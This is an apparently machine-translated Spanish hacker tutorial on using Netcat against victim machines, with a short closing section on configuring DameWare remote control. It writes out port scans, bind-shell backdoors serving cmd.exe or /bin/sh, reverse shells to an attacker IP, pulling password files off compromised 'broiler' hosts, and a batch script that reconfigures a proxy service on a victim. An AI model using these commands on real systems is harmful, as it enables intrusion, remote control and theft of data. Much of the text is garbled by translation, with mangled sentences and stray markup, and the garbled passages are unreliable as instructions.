########################################## # #########################
NC, un arma necesaria para los hackers, es conocida como la "navaja suiza" visible La función es muy poderosa.
Al comparar el servicio telnet.exe de Microsoft win2000 y el servicio tlntsvr.exe de Microsoft, puede verlo al conectarse.
1.1 NC.EXE no es estándar. programa cliente telnet,
1.2 también tiene un programa cliente putty.exe, que proporciona cuatro modos de conexión
-raw -telnet -rlogin
Aunque. También hay una nueva versión GUI del "NC" chino, ésta es aún más fácil de usar en comparación.
########################################## # ########################
2. Información de ayuda de Netcat 1.10 para NT
# ###. ################################################# ##############
C:\WINDOWS\Desktop>nc -h
[v1.10 NT]
conéctese a algún lugar: nc [-opciones] nombre de host puerto[s] [puertos] ...
escuche entrante: nc -l -p puerto [opciones] [nombre de host] [puerto]
opciones:
-d desconectar de la consola, modo en segundo plano (modo en segundo plano)
-e programar el programa entrante para ejecutarlo [¡¡peligroso!!]
-g punto[s] de salto de enrutamiento de origen de puerta de enlace, hasta 8
-G núm. puntero de enrutamiento de origen: 4, 8, 12, ...
-h esto cruft (esta información de ayuda)
-i intervalo de retraso de segundos para líneas enviadas, puertos escaneados (tiempo de retraso)
-l modo de escucha, para conexiones entrantes (modo de escucha, espera de conexión )
-L escucho con más atención, vuelvo a escuchar al cerrar el socket (continúa escuchando después de cerrar la conexión)
-n direcciones IP solo numéricas, sin DNS (modo de número de IP , análisis no DNS)
-o volcado de tráfico hexadecimal del archivo (archivo de salida en modo hexadecimal, tres secciones)
-p número de puerto local del puerto (puerto local)
-r aleatoriza los puertos locales y remotos (puertos remotos locales aleatorios)
-s addr dirección de origen local (dirección de origen local)
-t responder negociación TELNET
-u modo UDP
-v detallado [usar dos veces para ser más detallado] (-vv más información)
-w tiempo de espera de segundos para conexiones y lecturas de red finales p>
-z modo de E/S cero [usado para escaneo] (modo de escaneo,-vv)
los números de puerto pueden ser individuales o rangos: m-n [inclusive] 3. Formatos de comando comunes para Netcat 1.10
################################## ####### ###########################
3.1. Sondeo de puertos:
p>n.
c -vv puerto ip
RIVER [192.168.0.198] 19190 (?) abierto //Mostrar si está abierto
Escáner
nc -vv -w. 5 ip port-port port
nc -vv -z ip port-port port
Escanear de esta manera dejará muchos rastros, por lo que los administradores del sistema tendrán mucho cuidado
3.3. Puerta trasera
máquina víctima: //Máquina de la víctima
nc -l -p port -e cmd.exe //win2000
nc -l -p puerto -e /bin/sh //unix,linux
máquina del atacante: //máquina del atacante.
nc ip -p puerto //conecta la IP_víctima y luego consigue una concha.
3.4.Conexión inversa
Máquina atacante: //generalmente sql2.exe, desbordamiento remoto, ataque webdavx3.exe
//o wolff Conexión inversa.
nc -vv -l -p puerto
Máquina víctima:
nc -e cmd.exe ip del atacante -p puerto
nc -e /bin/sh ip del atacante -p puerto
O:
máquina atacante:
nc -vv -l -p puerto1 /*Para entrada */
nc -vv -l -p prot2 /*Para visualización*/
máquina víctima:
nc attacker_ip port1 cmd .exe nc attacker_ip port2
nc attacker_ip port1 /bin/sh nc attacker_ip port2
139 requiere el parámetro -s (nc.exe -L -p 139 -d -e cmd. exe -s el de la otra parte IP de la máquina)
Esto garantiza que nc.exe tenga prioridad sobre NETBIOS.
3.5. Transferir archivos:
3.5.1 máquina atacante <-- máquina víctima //Arrastre el archivo de contraseña desde el asador
nc -d -l -p puerto < ruta. \fileest /*máquina atacante*/ puede ser ejecutado por shell
nc -vv attacker_ip port > ruta\file.txt /*máquina víctima*/ requiere Ctrl+C para salir
// broiler requiere gui Ejecutar en el cmd.exe de la interfaz (iniciar sesión en el terminal, no es tan conveniente como instalar FTP, de lo contrario, no hay forma de ingresar Crl + C
3.5.2). máquina atacante --> máquina víctima //Sube el archivo de comando al broiler
nc -vv -l -p puerto > ruta\file.txt /*máquina víctima*/ Necesita Ctrl+C para salir
nc -d victim_ip port //Esto es mejor. Iniciamos sesión en la terminal e invadimos otros broilers. Podemos elegir el modo Shell para iniciar sesión. Conclusión: los archivos ASCII y bin se pueden transferir. Problema: después de conectarse a una IP, después de la transferencia. Cuando se complete, debe enviar Ctrl+C para salir de nc.exe. O solo puede conectarse nuevamente y usar pskill.exe para finalizar. Desconecte el proceso. Pero, ¿se ha abierto el identificador para el archivo de transferencia? lanzado 3.6 Captura de paquetes de datos del puerto nc -vv -w 2 -o test.txt www.hackervip.com 80 21-15 < 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Error de sintaxis < 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 75 6e 72#, comando " " unr < 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # reconocido... < 00000084 83 00 00 01 8f # ..... p> 3.7 telnet, procesamiento automático por lotes. nc victim_ip port < path\file.cmd /*victim machine*/ muestra el proceso de ejecución nc -vv victim_ip port < path\file.cmd /*victim machine*. / Muestra el proceso de ejecución nc -d victim_ip port < ruta\file.cmd Modo silencioso _______________file.cmd________________________ contraseña
echo []=[%windir%]
c:
cd \
md prueba
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config puerto 11111
net start sksockserver
salir
2) DameWare Mini Remote Control es un potente software de control remoto de Windows. Siempre que tenga una cuenta autorizada en el host remoto, podrá controlar el host remoto. Este software tiene la última versión china en Zhongan Network Training (www.hackervip.com/soft)
Método de configuración:
Configurar esto es muy simple, echemos un vistazo. Haga clic en "Propiedades" en el menú "Ver" para abrir la ventana "propiedades predeterminadas del host", seleccione "Opciones de instalación" y haga clic en "Editar" para configurar sus propiedades.
En la página "General" de la ventana "Propiedades de control remoto de DameWare", se proporcionan tres tipos de verificación de inicio de sesión remoto. Para Windows98/me, solo se puede utilizar el mecanismo de verificación de "desafío/respuesta propietario". lo cual requiere que configure su ID de usuario y contraseña. En cuanto a "desafío/respuesta de Windows NT" e "inicio de sesión de Windows cifrado (128 bits), el controlador requiere que tenga la cuenta y la contraseña del host de la otra parte. Aquí puede configurar tiempos de espera de puerto y conexión.